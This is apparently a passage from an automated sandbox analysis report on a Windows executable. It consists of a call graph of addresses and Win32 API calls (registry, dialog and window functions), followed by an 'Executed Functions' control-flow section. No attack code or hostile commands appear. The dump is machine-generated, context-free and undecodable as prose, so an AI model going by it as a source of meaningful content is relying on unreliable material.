81010->81011 81011->80999 81011->81000 81012 7ff738a72d7e RegCreateKeyExA 81012->81014 81015 7ff738a72db4 81012->81015 81013 7ff738a72dc0 RegOpenKeyExA 81013->81014 81013->81015 81014->81009 81014->81012 81014->81013 81016 7ff738a72de2 RegCloseKey 81014->81016 81015->81009 81017 7ff738a72df3 RegCloseKey 81015->81017 81016->81014 81017->81009 81018 7ff738a82550 81019 7ff738a82596 81018->81019 81020 7ff738a82585 GetWindowLongPtrA 81018->81020 81023 7ff738a52220 81019->81023 81020->81019 81024 7ff738a526a9 81023->81024 81025 7ff738a5225f 81023->81025 81026 7ff738a52a0e 81024->81026 81035 7ff738a526d3 SendMessageA SendMessageA SendMessageA 81024->81035 81027 7ff738a5226e 81025->81027 81028 7ff738a527ef 81025->81028 81029 7ff738ae9230 swprintf 8 API calls 81026->81029 81030 7ff738a5227b 81027->81030 81031 7ff738a5285f 81027->81031 81028->81026 81033 7ff738a5280a KillTimer 81028->81033 81032 7ff738a52a1e 81029->81032 81086 7ff738a53fa0 81030->81086 81147 7ff738a54020 154 API calls swprintf 81031->81147 81145 7ff738a73280 188 API calls swprintf 81033->81145 81064 7ff738a52751 81035->81064 81039 7ff738a5286f 81042 7ff738ae9230 swprintf 8 API calls 81039->81042 81041 7ff738a52827 81044 7ff738a5282c MessageBoxA 81041->81044 81047 7ff738a52850 81041->81047 81045 7ff738a52882 81042->81045 81043 7ff738a52a34 81046 7ff738a546a0 11 API calls 81043->81046 81044->81047 81045->81032 81067 7ff738a52a70 81046->81067 81146 7ff738a825c0 GetWindowLongPtrA 81047->81146 81049 7ff738a5285a 81049->81026 81051 7ff738a5232c LoadIconA SendMessageA 81130 7ff738a83c00 GetDesktopWindow GetWindowRect 81051->81130 81052 7ff738a527d8 GetDlgItem 81053 7ff738a527e7 DestroyWindow 81052->81053 81052->81064 81053->81064 81054 7ff738a522ba 81054->81051 81096 7ff738a55b90 81054->81096 81058 7ff738a52ad8 81060 7ff738a59f60 SetWindowTextA 81058->81060 81062 7ff738a52ae2 SendMessageA InvalidateRect SetFocus 81060->81062 81061 7ff738a528c1 SendMessageA 81063 7ff738a528d8 81061->81063 81062->81026 81148 7ff738afa0ec 98 API calls 3 library calls 81063->81148 81064->81043 81064->81052 81143 7ff738a55950 99 API calls 81064->81143 81144 7ff738a55af0 98 API calls 81064->81144 81065 7ff738a55b90 140 API calls 81065->81067 81067->81058 81067->81065 81068 7ff738a5288a SendMessageA 81069 7ff738a528f1 81068->81069 81070 7ff738a528bf 81068->81070 81071 7ff738a546a0 11 API calls 81069->81071 81070->81063 81079 7ff738a52923 81071->81079 81073 7ff738a52988 81074 7ff738a59f60 SetWindowTextA 81073->81074 81076 7ff738a52992 81074->81076 81075 7ff738a524f9 memcpy_s swprintf 81075->81068 81080 7ff738a52634 SendMessageA 81075->81080 81142 7ff738afa0ec 98 API calls 3 library calls 81075->81142 81078 7ff738a5299c SetTimer 81076->81078 81083 7ff738a529b3 81076->81083 81077 7ff738a55b90 140 API calls 81077->81079 81078->81083 81079->81073 81079->81077 81080->81075 81081 7ff738a5266f SendMessageA 81080->81081 81081->81075 81082 7ff738a529f8 ShowWindow 81082->81026 81083->81082 81085 7ff738a529ee 81083->81085 81136 7ff738a59e30 81083->81136 81085->81082 81087 7ff738a53fbe 81086->81087 81088 7ff738a53fb5 SetWindowTextA 81086->81088 81089 7ff738a53fc7 GetWindowLongPtrA SetWindowLongPtrA 81087->81089 81090 7ff738a53ff2 GetDlgItem 81087->81090 81088->81087 81089->81090 81091 7ff738a52286 81090->81091 81092 7ff738a54005 DestroyWindow 81090->81092 81093 7ff738a546a0 SendMessageA GetClientRect MapDialogRect 81091->81093 81092->81091 81094 7ff738ae9230 swprintf 8 API calls 81093->81094 81095 7ff738a5473f 81094->81095 81095->81054 81149 7ff738a83d50 81096->81149 81099 7ff738a55c66 81100 7ff738a6f680 134 API calls 81099->81100 81105 7ff738a55db2 81099->81105 81102 7ff738a55cc2 81100->81102 81101 7ff738a6f680 134 API calls 81103 7ff738a55c0b 81101->81103 81104 7ff738a76a00 134 API calls 81102->81104 81106 7ff738a70ca0 134 API calls 81103->81106 81107 7ff738a55ce2 81104->81107 81113 7ff738afa0ec 98 API calls 81105->81113 81120 7ff738a57a5a 81105->81120 81126 7ff738a57904 81105->81126 81108 7ff738a55c48 81106->81108 81109 7ff738a55d21 81107->81109 81111 7ff738a70ca0 134 API calls 81107->81111 81108->81099 81154 7ff738afa0ec 98 API calls 3 library calls 81108->81154 81112 7ff738a70ca0 134 API calls 81109->81112 81114 7ff738a55d03 81111->81114 81115 7ff738a55d32 81112->81115 81113->81105 81114->81109 81155 7ff738afa0ec 98 API calls 3 library calls 81114->81155 81118 7ff738a55d50 81115->81118 81156 7ff738afa0ec 98 API calls 3 library calls 81115->81156 81116 7ff738a579e9 81117 7ff738ae9230 swprintf 8 API calls 81116->81117 81119 7ff738a579fd 81117->81119 81123 7ff738a54750 4 API calls 81118->81123 81119->81054 81157 7ff738afa0ec 98 API calls 3 library calls 81120->81157 81123->81105 81124 7ff738a54750 4 API calls 81124->81116 81126->81116 81126->81124 81127 7ff738a57a73 81158 7ff738a37d20 100 API calls swprintf 81127->81158 81129 7ff738a57a78 81131 7ff738a83c9c 81130->81131 81132 7ff738a83c31 GetWindowRect 81130->81132 81134 7ff738ae9230 swprintf 8 API calls 81131->81134 81132->81131 81133 7ff738a83c43 MoveWindow 81132->81133 81133->81131 81135 7ff738a52361 8 API calls 81134->81135 81135->81061 81135->81075 81137 7ff738a59e75 81136->81137 81139 7ff738a59e3f 81136->81139 81137->81082 81138 7ff738a71980 98 API calls 81138->81139 81139->81137 81139->81138 81140 7ff738a59e7f GetDlgItem SetFocus 81139->81140 81142->81075 81143->81064 81144->81064 81145->81041 81146->81049 81147->81039 81148->81069 81150 7ff738a55be3 81149->81150 81151 7ff738a83d63 81149->81151 81150->81099 81150->81101 81150->81105 81151->81150 81152 7ff738a6f680 134 API calls 81151->81152 81153 7ff738a83d99 81152->81153 81154->81099 81155->81109 81156->81118 81157->81127 81158->81129 81159 7ff738a7e950 81160 7ff738a7e999 81159->81160 81161 7ff738a7e966 81159->81161 81188 7ff738a58f50 135 API calls swprintf 81160->81188 81162 7ff738a7e9cc 81161->81162 81164 7ff738a6d200 98 API calls 81161->81164 81166 7ff738a7e978 81164->81166 81165 7ff738a7e9a4 81167 7ff738a6d200 98 API calls 81165->81167 81169 7ff738a7e97d 81166->81169 81170 7ff738a7e9e4 81166->81170 81168 7ff738a7e9b4 81167->81168 81189 7ff738a6de80 81168->81189 81173 7ff738a59820 100 API calls 81169->81173 81177 7ff738a59820 81170->81177 81174 7ff738a7e98f 81173->81174 81175 7ff738a6d390 98 API calls 81174->81175 81176 7ff738a7ea00 81175->81176 81178 7ff738a59875 81177->81178 81180 7ff738a5983c 81177->81180 81192 7ff738afa0ec 98 API calls 3 library calls 81178->81192 81180->81178 81181 7ff738a5988e 81180->81181 81182 7ff738a71980 98 API calls 81180->81182 81183 7ff738a598a2 81181->81183 81193 7ff738afa0ec 98 API calls 3 library calls 81181->81193 81182->81180 81185 7ff738a59937 81194 7ff738a37d20 100 API calls swprintf 81185->81194 81187 7ff738a5993c 81188->81165 81195 7ff738a6dd80 81189->81195 81192->81181 81193->81185 81194->81187 81196 7ff738a6dda7 81195->81196 81200 7ff738a6ddc0 81195->81200 81213 7ff738afa0ec 98 API calls 3 library calls 81196->81213 81198 7ff738a6de6b 81198->81162 81199 7ff738a6ddf0 81201 7ff738a6f680 134 API calls 81199->81201 81200->81198 81200->81199 81214 7ff738afa0ec 98 API calls 3 library calls 81200->81214 81203 7ff738a6de02 81201->81203 81204 7ff738a76a00 134 API calls 81203->81204 81205 7ff738a6de0f 81204->81205 81206 7ff738a70ca0 134 API calls 81205->81206 81207 7ff738a6de22 81206->81207 81207->81198 81215 7ff738a722e0 98 API calls swprintf 81207->81215 81209 7ff738a6de3a 81210 7ff738a70ca0 134 API calls 81209->81210 81211 7ff738a6de4d 81210->81211 81211->81198 81216 7ff738afa0ec 98 API calls 3 library calls 81211->81216 81213->81200 81214->81199 81215->81209 81216->81198 81217 7ff738a7eb70 81218 7ff738a6d200 98 API calls 81217->81218 81219 7ff738a7eb99 81218->81219 81220 7ff738a7ec3a 81219->81220 81221 7ff738a7eba8 81219->81221 81223 7ff738a7ec48 81220->81223 81224 7ff738a7ed1f 81220->81224 81222 7ff738a7ed5c 81221->81222 81225 7ff738a7ebbb 81221->81225 81226 7ff738a7ed61 81221->81226 81223->81222 81227 7ff738a59d00 99 API calls 81223->81227 81224->81222 81297 7ff738a58b30 99 API calls 81224->81297 81225->81222 81272 7ff738a58be0 101 API calls 81225->81272 81226->81222 81279 7ff738a594d0 100 API calls 81226->81279 81229 7ff738a7ec5d 81227->81229 81233 7ff738a59140 99 API calls 81229->81233 81231 7ff738a7ed76 81231->81222 81280 7ff738a59410 99 API calls 81231->81280 81235 7ff738a7ec68 81233->81235 81234 7ff738a7ebd9 81239 7ff738a7ebfd 81234->81239 81273 7ff738afa0ec 98 API calls 3 library calls 81234->81273 81237 7ff738a7ec92 81235->81237 81276 7ff738afa0ec 98 API calls 3 library calls 81235->81276 81242 7ff738a7ecf6 81237->81242 81244 7ff738a7ecff 81237->81244 81265 7ff738a592f0 81237->81265 81238 7ff738a7ed8c 81281 7ff738a58b30 99 API calls 81238->81281 81253 7ff738a7ec33 81239->81253 81274 7ff738a594d0 100 API calls 81239->81274 81242->81244 81277 7ff738a596b0 99 API calls 81244->81277 81249 7ff738a7ec1c 81249->81222 81275 7ff738a59410 99 API calls 81249->81275 81250 7ff738a7ed0f 81278 7ff738a59d80 101 API calls 81250->81278 81253->81222 81282 7ff738a6db90 81253->81282 81254 7ff738a7ed1a 81254->81222 81255 7ff738a7edbb 81256 7ff738a7edee 81255->81256 81295 7ff738afa0ec 98 API calls 3 library calls 81255->81295 81258 7ff738a7ee0c 81256->81258 81296 7ff738afa0ec 98 API calls 3 library calls 81256->81296 81260 7ff738a6d200 98 API calls 81258->81260 81261 7ff738a7ee19 81260->81261 81262 7ff738a7ee35 81261->81262 81263 7ff738a6db90 134 API calls 81261->81263 81264 7ff738a59f60 SetWindowTextA 81262->81264 81263->81262 81264->81224 81269 7ff738a5930d 81265->81269 81271 7ff738a59349 81265->81271 81267 7ff738a71980 98 API calls 81267->81269 81268 7ff738a59364 SendDlgItemMessageA SendDlgItemMessageA 81268->81237 81269->81267 81269->81271 81271->81268 81298 7ff738afa0ec 98 API calls 3 library calls 81271->81298 81272->81234 81273->81239 81274->81249 81275->81253 81276->81237 81277->81250 81278->81254 81279->81231 81280->81238 81283 7ff738a6f680 134 API calls 81282->81283 81284 7ff738a6dbb6 81283->81284 81285 7ff738a6dbe6 81284->81285 81299 7ff738afa0ec 98 API calls 3 library calls 81284->81299 81287 7ff738a6dc06 81285->81287 81300 7ff738afa0ec 98 API calls 3 library calls 81285->81300 81289 7ff738a70ca0 134 API calls 81287->81289 81290 7ff738a6dc17 81289->81290 81294 7ff738a6dc42 81290->81294 81301 7ff738a722e0 98 API calls swprintf 81290->81301 81292 7ff738a6dc2f 81293 7ff738a70ca0 134 API calls 81292->81293 81293->81294 81294->81255 81295->81256 81296->81258 81298->81268 81299->81285 81300->81287 81301->81292 81302 7ff738a5653b 81303 7ff738a57aa0 135 API calls 81302->81303 81304 7ff738a5654c 81303->81304 81305 7ff738a6f680 134 API calls 81304->81305 81311 7ff738a5656b 81305->81311 81306 7ff738a56a96 81349 7ff738a54850 81306->81349 81308 7ff738a57aa0 135 API calls 81308->81311 81310 7ff738a56acb 81312 7ff738a6f680 134 API calls 81310->81312 81330 7ff738a55e35 81310->81330 81311->81306 81311->81308 81359 7ff738afa0ec 98 API calls 3 library calls 81311->81359 81313 7ff738a57535 81312->81313 81314 7ff738a70ca0 134 API calls 81313->81314 81315 7ff738a57570 81314->81315 81316 7ff738a5758e 81315->81316 81360 7ff738afa0ec 98 API calls 3 library calls 81315->81360 81318 7ff738a70ca0 134 API calls 81316->81318 81319 7ff738a5759f 81318->81319 81328 7ff738a575bd 81319->81328 81361 7ff738afa0ec 98 API calls 3 library calls 81319->81361 81320 7ff738a579e9 81321 7ff738ae9230 swprintf 8 API calls 81320->81321 81324 7ff738a579fd 81321->81324 81322 7ff738a57904 81322->81320 81325 7ff738a54750 4 API calls 81322->81325 81325->81320 81326 7ff738afa0ec 98 API calls 81326->81330 81340 7ff738a57630 81328->81340 81362 7ff738affacc 63 API calls 81328->81362 81363 7ff738afa0ec 98 API calls 3 library calls 81328->81363 81329 7ff738a57a5a 81368 7ff738afa0ec 98 API calls 3 library calls 81329->81368 81330->81322 81330->81326 81330->81329 81333 7ff738a57a73 81369 7ff738a37d20 100 API calls swprintf 81333->81369 81334 7ff738a71980 98 API calls 81334->81340 81336 7ff738a57a78 81337 7ff738a576a5 GetDlgItem 81337->81340 81340->81330 81340->81334 81340->81337 81343 7ff738a57710 81340->81343 81364 7ff738afa0ec 98 API calls 3 library calls 81340->81364 81365 7ff738afa0ec 98 API calls 3 library calls 81340->81365 81341 7ff738a71980 98 API calls 81341->81343 81342 7ff738a57755 GetDlgItem 81342->81343 81343->81330 81343->81341 81343->81342 81346 7ff738a577fc GetDlgItem 81343->81346 81347 7ff738a5781c ScreenToClient 81343->81347 81366 7ff738afa0ec 98 API calls 3 library calls 81343->81366 81367 7ff738afa0ec 98 API calls 3 library calls 81343->81367 81346->81343 81347->81343 81348 7ff738a57850 SetWindowPos 81347->81348 81348->81343 81350 7ff738a54881 81349->81350 81355 7ff738a548d4 81349->81355 81351 7ff738a54750 4 API calls 81350->81351 81351->81355 81352 7ff738a548dd 81353 7ff738ae9230 swprintf 8 API calls 81352->81353 81354 7ff738a54a70 81353->81354 81354->81310 81355->81352 81356 7ff738a54750 4 API calls 81355->81356 81357 7ff738a54974 81356->81357 81357->81352 81358 7ff738a54750 4 API calls 81357->81358 81358->81357 81359->81311 81360->81316 81361->81328 81362->81328 81363->81328 81364->81337 81365->81340 81366->81342 81367->81343 81368->81333 81369->81336 81370 7ff738a566fe 81371 7ff738a57aa0 135 API calls 81370->81371 81372 7ff738a5670b 81371->81372 81373 7ff738a56761 81372->81373 81374 7ff738a56750 SendMessageA 81372->81374 81375 7ff738a54750 4 API calls 81373->81375 81374->81373 81376 7ff738a567bc 81375->81376 81377 7ff738a6f680 134 API calls 81376->81377 81395 7ff738a55e35 81376->81395 81378 7ff738a57535 81377->81378 81379 7ff738a70ca0 134 API calls 81378->81379 81380 7ff738a57570 81379->81380 81381 7ff738a5758e 81380->81381 81414 7ff738afa0ec 98 API calls 3 library calls 81380->81414 81383 7ff738a70ca0 134 API calls 81381->81383 81384 7ff738a5759f 81383->81384 81393 7ff738a575bd 81384->81393 81415 7ff738afa0ec 98 API calls 3 library calls 81384->81415 81385 7ff738a579e9 81387 7ff738ae9230 swprintf 8 API calls 81385->81387 81390 7ff738a579fd 81387->81390 81388 7ff738a57904 81388->81385 81392 7ff738a54750 4 API calls 81388->81392 81389 7ff738afa0ec 98 API calls 81389->81395 81392->81385 81405 7ff738a57630 81393->81405 81416 7ff738affacc 63 API calls 81393->81416 81417 7ff738afa0ec 98 API calls 3 library calls 81393->81417 81394 7ff738a57a5a 81422 7ff738afa0ec 98 API calls 3 library calls 81394->81422 81395->81388 81395->81389 81395->81394 81398 7ff738a71980 98 API calls 81398->81405 81399 7ff738a57a73 81423 7ff738a37d20 100 API calls swprintf 81399->81423 81401 7ff738a576a5 GetDlgItem 81401->81405 81402 7ff738a57a78 81405->81395 81405->81398 81405->81401 81408 7ff738a57710 81405->81408 81418 7ff738afa0ec 98 API calls 3 library calls 81405->81418 81419 7ff738afa0ec 98 API calls 3 library calls 81405->81419 81406 7ff738a71980 98 API calls 81406->81408 81407 7ff738a57755 GetDlgItem 81407->81408 81408->81395 81408->81406 81408->81407 81411 7ff738a577fc GetDlgItem 81408->81411 81412 7ff738a5781c ScreenToClient 81408->81412 81420 7ff738afa0ec 98 API calls 3 library calls 81408->81420 81421 7ff738afa0ec 98 API calls 3 library calls 81408->81421 81411->81408 81412->81408 81413 7ff738a57850 SetWindowPos 81412->81413 81413->81408 81414->81381 81415->81393 81416->81393 81417->81393 81418->81401 81419->81405 81420->81407 81421->81408 81422->81399 81423->81402 81424 7ff738a67464 81428 7ff738a67477 81424->81428 81425 7ff738a674a8 81426 7ff738a6de80 134 API calls 81425->81426 81427 7ff738a67677 81426->81427 81428->81425 81429 7ff738a76a00 134 API calls 81428->81429 81429->81425 81430 7ff738a5647f 81431 7ff738a57aa0 135 API calls 81430->81431 81432 7ff738a5648c 81431->81432 81433 7ff738a564a8 81432->81433 81434 7ff738a56c56 81432->81434 81435 7ff738a570ad 81433->81435 81436 7ff738a564b6 81433->81436 81439 7ff738a54750 4 API calls 81434->81439 81446 7ff738a56d5e 81434->81446 81437 7ff738a57122 81435->81437 81441 7ff738a54750 4 API calls 81435->81441 81438 7ff738a56525 81436->81438 81442 7ff738a54750 4 API calls 81436->81442 81443 7ff738a54750 4 API calls 81437->81443 81445 7ff738a54750 4 API calls 81438->81445 81440 7ff738a56d00 81439->81440 81444 7ff738a54750 4 API calls 81440->81444 81441->81437 81442->81438 81443->81446 81444->81446 81445->81446 81447 7ff738a6f680 134 API calls 81446->81447 81465 7ff738a55e35 81446->81465 81448 7ff738a57535 81447->81448 81449 7ff738a70ca0 134 API calls 81448->81449 81450 7ff738a57570 81449->81450 81451 7ff738a5758e 81450->81451 81484 7ff738afa0ec 98 API calls 3 library calls 81450->81484 81453 7ff738a70ca0 134 API calls 81451->81453 81454 7ff738a5759f 81453->81454 81463 7ff738a575bd 81454->81463 81485 7ff738afa0ec 98 API calls 3 library calls 81454->81485 81455 7ff738a579e9 81456 7ff738ae9230 swprintf 8 API calls 81455->81456 81459 7ff738a579fd 81456->81459 81457 7ff738a57904 81457->81455 81460 7ff738a54750 4 API calls 81457->81460 81460->81455 81461 7ff738afa0ec 98 API calls 81461->81465 81475 7ff738a57630 81463->81475 81486 7ff738affacc 63 API calls 81463->81486 81487 7ff738afa0ec 98 API calls 3 library calls 81463->81487 81464 7ff738a57a5a 81492 7ff738afa0ec 98 API calls 3 library calls 81464->81492 81465->81457 81465->81461 81465->81464 81468 7ff738a57a73 81493 7ff738a37d20 100 API calls swprintf 81468->81493 81469 7ff738a71980 98 API calls 81469->81475 81471 7ff738a57a78 81472 7ff738a576a5 GetDlgItem 81472->81475 81475->81465 81475->81469 81475->81472 81477 7ff738a57710 81475->81477 81488 7ff738afa0ec 98 API calls 3 library calls 81475->81488 81489 7ff738afa0ec 98 API calls 3 library calls 81475->81489 81476 7ff738a71980 98 API calls 81476->81477 81477->81465 81477->81476 81478 7ff738a57755 GetDlgItem 81477->81478 81481 7ff738a577fc GetDlgItem 81477->81481 81482 7ff738a5781c ScreenToClient 81477->81482 81490 7ff738afa0ec 98 API calls 3 library calls 81477->81490 81491 7ff738afa0ec 98 API calls 3 library calls 81477->81491 81478->81477 81481->81477 81482->81477 81483 7ff738a57850 SetWindowPos 81482->81483 81483->81477 81484->81451 81485->81463 81486->81463 81487->81463 81488->81472 81489->81475 81490->81478 81491->81477 81492->81468 81493->81471 81494 7ff738a563c0 81495 7ff738a56d6b 81494->81495 81496 7ff738a563ca 81494->81496 81497 7ff738a54750 4 API calls 81495->81497 81543 7ff738a54a90 GetDC 81496->81543 81500 7ff738a56dc6 SetDlgItemTextA 81497->81500 81559 7ff738a78cd0 6 API calls 81500->81559 81502 7ff738a57aa0 135 API calls 81503 7ff738a563f3 81502->81503 81504 7ff738a54750 4 API calls 81503->81504 81507 7ff738a5646c 81504->81507 81505 7ff738a6f680 134 API calls 81506 7ff738a57535 81505->81506 81508 7ff738a70ca0 134 API calls 81506->81508 81507->81505 81524 7ff738a55e35 81507->81524 81509 7ff738a57570 81508->81509 81510 7ff738a5758e 81509->81510 81560 7ff738afa0ec 98 API calls 3 library calls 81509->81560 81512 7ff738a70ca0 134 API calls 81510->81512 81513 7ff738a5759f 81512->81513 81522 7ff738a575bd 81513->81522 81561 7ff738afa0ec 98 API calls 3 library calls 81513->81561 81514 7ff738afa0ec 98 API calls 81514->81524 81515 7ff738a579e9 81516 7ff738ae9230 swprintf 8 API calls 81515->81516 81519 7ff738a579fd 81516->81519 81517 7ff738a57904 81517->81515 81520 7ff738a54750 4 API calls 81517->81520 81520->81515 81534 7ff738a57630 81522->81534 81562 7ff738affacc 63 API calls 81522->81562 81563 7ff738afa0ec 98 API calls 3 library calls 81522->81563 81523 7ff738a57a5a 81568 7ff738afa0ec 98 API calls 3 library calls 81523->81568 81524->81514 81524->81517 81524->81523 81527 7ff738a57a73 81569 7ff738a37d20 100 API calls swprintf 81527->81569 81528 7ff738a71980 98 API calls 81528->81534 81530 7ff738a57a78 81531 7ff738a576a5 GetDlgItem 81531->81534 81534->81524 81534->81528 81534->81531 81537 7ff738a57710 81534->81537 81564 7ff738afa0ec 98 API calls 3 library calls 81534->81564 81565 7ff738afa0ec 98 API calls 3 library calls 81534->81565 81535 7ff738a71980 98 API calls 81535->81537 81536 7ff738a57755 GetDlgItem 81536->81537 81537->81524 81537->81535 81537->81536 81540 7ff738a577fc GetDlgItem 81537->81540 81541 7ff738a5781c ScreenToClient 81537->81541 81566 7ff738afa0ec 98 API calls 3 library calls 81537->81566 81567 7ff738afa0ec 98 API calls 3 library calls 81537->81567 81540->81537 81541->81537 81542 7ff738a57850 SetWindowPos 81541->81542 81542->81537 81544 7ff738a6fd50 134 API calls 81543->81544 81545 7ff738a54ad2 81544->81545 81546 7ff738a6f680 134 API calls 81545->81546 81547 7ff738a54aee SetMapMode MapDialogRect SendMessageA SelectObject 81546->81547 81548 7ff738a54d28 SelectObject ReleaseDC 81547->81548 81549 7ff738a54b6f 81547->81549 81550 7ff738a54d4a 81548->81550 81551 7ff738a54b85 GetTextExtentExPointA 81549->81551 81552 7ff738ae9230 swprintf 8 API calls 81550->81552 81556 7ff738a54bbe 81551->81556 81557 7ff738a54ca8 81551->81557 81553 7ff738a54d6f 81552->81553 81553->81502 81555 7ff738afd5e0 62 API calls 81555->81556 81556->81555 81556->81557 81558 7ff738a54cbb GetTextExtentExPointA 81556->81558 81570 7ff738a6ecc0 8 API calls swprintf 81556->81570 81557->81548 81558->81556 81558->81557 81559->81507 81560->81510 81561->81522 81562->81522 81563->81522 81564->81531 81565->81534 81566->81536 81567->81537 81568->81527 81569->81530 81570->81556 81571 7ff738a7ea20 81572 7ff738a7ea7f 81571->81572 81575 7ff738a7ea48 81571->81575 81607 7ff738a58f50 135 API calls swprintf 81572->81607 81574 7ff738a7eb4a 81577 7ff738ae9230 swprintf 8 API calls 81574->81577 81575->81574 81576 7ff738a6d200 98 API calls 81575->81576 81579 7ff738a7ea5e 81576->81579 81580 7ff738a7eb57 81577->81580 81578 7ff738a7ea8a 81608 7ff738afb554 81578->81608 81582 7ff738a7eac8 81579->81582 81583 7ff738a7ea63 81579->81583 81585 7ff738a59820 100 API calls 81582->81585 81586 7ff738a59820 100 API calls 81583->81586 81584 7ff738a7ea95 81589 7ff738a6d200 98 API calls 81584->81589 81587 7ff738a7eada 81585->81587 81590 7ff738a7ea75 81586->81590 81588 7ff738a6d200 98 API calls 81587->81588 81588->81590 81592 7ff738a7eaac 81589->81592 81591 7ff738a6d200 98 API calls 81590->81591 81593 7ff738a7eabe 81590->81593 81594 7ff738a7eaf8 81591->81594 81595 7ff738a7eb0e 81592->81595 81596 7ff738a7eab1 81592->81596 81601 7ff738a58df0 81593->81601 81616 7ff738a31000 81594->81616 81598 7ff738ae9230 swprintf 8 API calls 81595->81598 81599 7ff738ae9230 swprintf 8 API calls 81596->81599 81598->81593 81599->81593 81602 7ff738a58e45 81601->81602 81606 7ff738a58e09 81601->81606 81605 7ff738a58e6d SetDlgItemTextA 81602->81605 81622 7ff738afa0ec 98 API calls 3 library calls 81602->81622 81604 7ff738a71980 98 API calls 81604->81606 81606->81602 81606->81604 81607->81578 81609 7ff738afb584 81608->81609 81623 7ff738afb604 81609->81623 81612 7ff738afb5d8 81614 7ff738afb5ed 81612->81614 81645 7ff738aebb20 59 API calls swprintf 81612->81645 81614->81584 81617 7ff738a31035 swprintf 81616->81617 81655 7ff738aeb828 81617->81655 81620 7ff738ae9230 swprintf 8 API calls 81621 7ff738a31075 81620->81621 81621->81593 81622->81605 81624 7ff738afb635 81623->81624 81625 7ff738afb647 81623->81625 81646 7ff738af8ec8 11 API calls _get_daylight 81624->81646 81627 7ff738afb691 81625->81627 81630 7ff738afb654 81625->81630 81628 7ff738afb6ac 81627->81628 81649 7ff738aebb90 59 API calls swprintf 81627->81649 81636 7ff738afb6ce 81628->81636 81650 7ff738af13fc 62 API calls 81628->81650 81629 7ff738afb63a 81647 7ff738b02f2c 59 API calls _invalid_parameter_noinfo 81629->81647 81648 7ff738b030f8 37 API calls swprintf 81630->81648 81635 7ff738afb76c 81639 7ff738afb5b3 81635->81639 81653 7ff738af8ec8 11 API calls _get_daylight 81635->81653 81636->81635 81651 7ff738af8ec8 11 API calls _get_daylight 81636->81651 81639->81612 81644 7ff738aebb20 59 API calls swprintf 81639->81644 81640 7ff738afb761 81652 7ff738b02f2c 59 API calls _invalid_parameter_noinfo 81640->81652 81641 7ff738afb819 81654 7ff738b02f2c 59 API calls _invalid_parameter_noinfo 81641->81654 81644->81612 81645->81614 81646->81629 81647->81639 81648->81639 81649->81628 81650->81628 81651->81640 81652->81635 81653->81641 81654->81639 81658 7ff738aeb882 81655->81658 81656 7ff738aeb8a7 81677 7ff738b030f8 37 API calls swprintf 81656->81677 81657 7ff738aeb8e3 81678 7ff738aece3c 63 API calls 2 library calls 81657->81678 81658->81656 81658->81657 81661 7ff738aeba3d 81663 7ff738aeba53 81661->81663 81683 7ff738aebb20 59 API calls swprintf 81661->81683 81666 7ff738ae9230 swprintf 8 API calls 81663->81666 81664 7ff738aeb9c0 81681 7ff738b02e14 11 API calls 2 library calls 81664->81681 81669 7ff738a3105c 81666->81669 81668 7ff738aeb97a 81668->81664 81670 7ff738aeb995 81668->81670 81671 7ff738aeb9e4 81668->81671 81674 7ff738aeb98c 81668->81674 81669->81620 81679 7ff738b02e14 11 API calls 2 library calls 81670->81679 81671->81664 81672 7ff738aeb9ee 81671->81672 81680 7ff738b02e14 11 API calls 2 library calls 81672->81680 81674->81664 81674->81670 81676 7ff738aeb8d1 81676->81661 81682 7ff738aebb20 59 API calls swprintf 81676->81682 81677->81676 81678->81668 81679->81676 81680->81676 81681->81676 81682->81661 81683->81663

                                                          Executed Functions

                                                          Function 00007FF738A352A7 Relevance: 191.6, APIs: 74, Strings: 35, Instructions: 867windowlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1528 7ff738a352a7-7ff738a35324 call 7ff738a72840 call 7ff738a6a030 call 7ff738a54620 call 7ff738a5a760 call 7ff738a51fc0 call 7ff738a73f30 1541 7ff738a35331-7ff738a3533e RegisterClipboardFormatA 1528->1541 1542 7ff738a35326 1528->1542 1544 7ff738a35344-7ff738a35379 call 7ff738a3d570 call 7ff738a72b00 * 3 1541->1544 1543 7ff738a35328-7ff738a3532f 1542->1543 1542->1544 1543->1541 1543->1544 1553 7ff738a3537b-7ff738a353a1 GetProcAddress * 2 1544->1553 1554 7ff738a353a3-7ff738a353ae 1544->1554 1555 7ff738a353b0-7ff738a353ba 1553->1555 1554->1555 1556 7ff738a353bc-7ff738a353e2 GetProcAddress * 2 1555->1556 1557 7ff738a353e4-7ff738a353ef 1555->1557 1558 7ff738a353f1-7ff738a353fb 1556->1558 1557->1558 1559 7ff738a35438-7ff738a3544e 1558->1559 1560 7ff738a353fd-7ff738a35436 GetProcAddress * 3 1558->1560 1561 7ff738a35450-7ff738a3545a 1559->1561 1560->1561 1562 7ff738a3546e 1561->1562 1563 7ff738a3545c-7ff738a3546c GetProcAddress 1561->1563 1564 7ff738a35470-7ff738a3547a 1562->1564 1563->1564 1565 7ff738a3547c-7ff738a354a2 GetProcAddress * 2 1564->1565 1566 7ff738a354a4-7ff738a354af 1564->1566 1567 7ff738a354b1-7ff738a3554f call 7ff738a728b0 call 7ff738a6f680 call 7ff738aeab50 call 7ff738a6cdf0 CoInitializeEx 1565->1567 1566->1567 1576 7ff738a35551-7ff738a355bf call 7ff738a6ea20 MessageBoxA call 7ff738a6f720 call 7ff738ae9230 1567->1576 1577 7ff738a355c0-7ff738a355cf call 7ff738a3cf20 1567->1577 1581 7ff738a355d4-7ff738a3566a call 7ff738aeab50 call 7ff738a6d200 * 4 1577->1581 1596 7ff738a3566c-7ff738a35676 1581->1596 1597 7ff738a356b1-7ff738a356c2 GetDesktopWindow GetClientRect 1581->1597 1596->1597 1598 7ff738a35678-7ff738a356af GetMonitorInfoA 1596->1598 1599 7ff738a356c8-7ff738a35706 call 7ff738a667b0 1597->1599 1598->1599 1603 7ff738a35708-7ff738a3570b 1599->1603 1604 7ff738a3570d-7ff738a35714 1599->1604 1605 7ff738a35718-7ff738a3582a call 7ff738a6eb00 * 3 call 7ff738a6d140 call 7ff738a6d200 call 7ff738a6d140 * 2 call 7ff738a31080 CreateWindowExW 1603->1605 1604->1605 1622 7ff738a35848-7ff738a35862 1605->1622 1623 7ff738a3582c-7ff738a35843 GetLastError call 7ff738a74050 call 7ff738a362f0 1605->1623 1625 7ff738a358cb-7ff738a35906 GetDC GetDeviceCaps * 2 ReleaseDC 1622->1625 1626 7ff738a35864-7ff738a3586e 1622->1626 1623->1622 1627 7ff738a3590c-7ff738a3597e call 7ff738a6f720 SetWindowLongPtrA call 7ff738a36380 call 7ff738a6f680 1625->1627 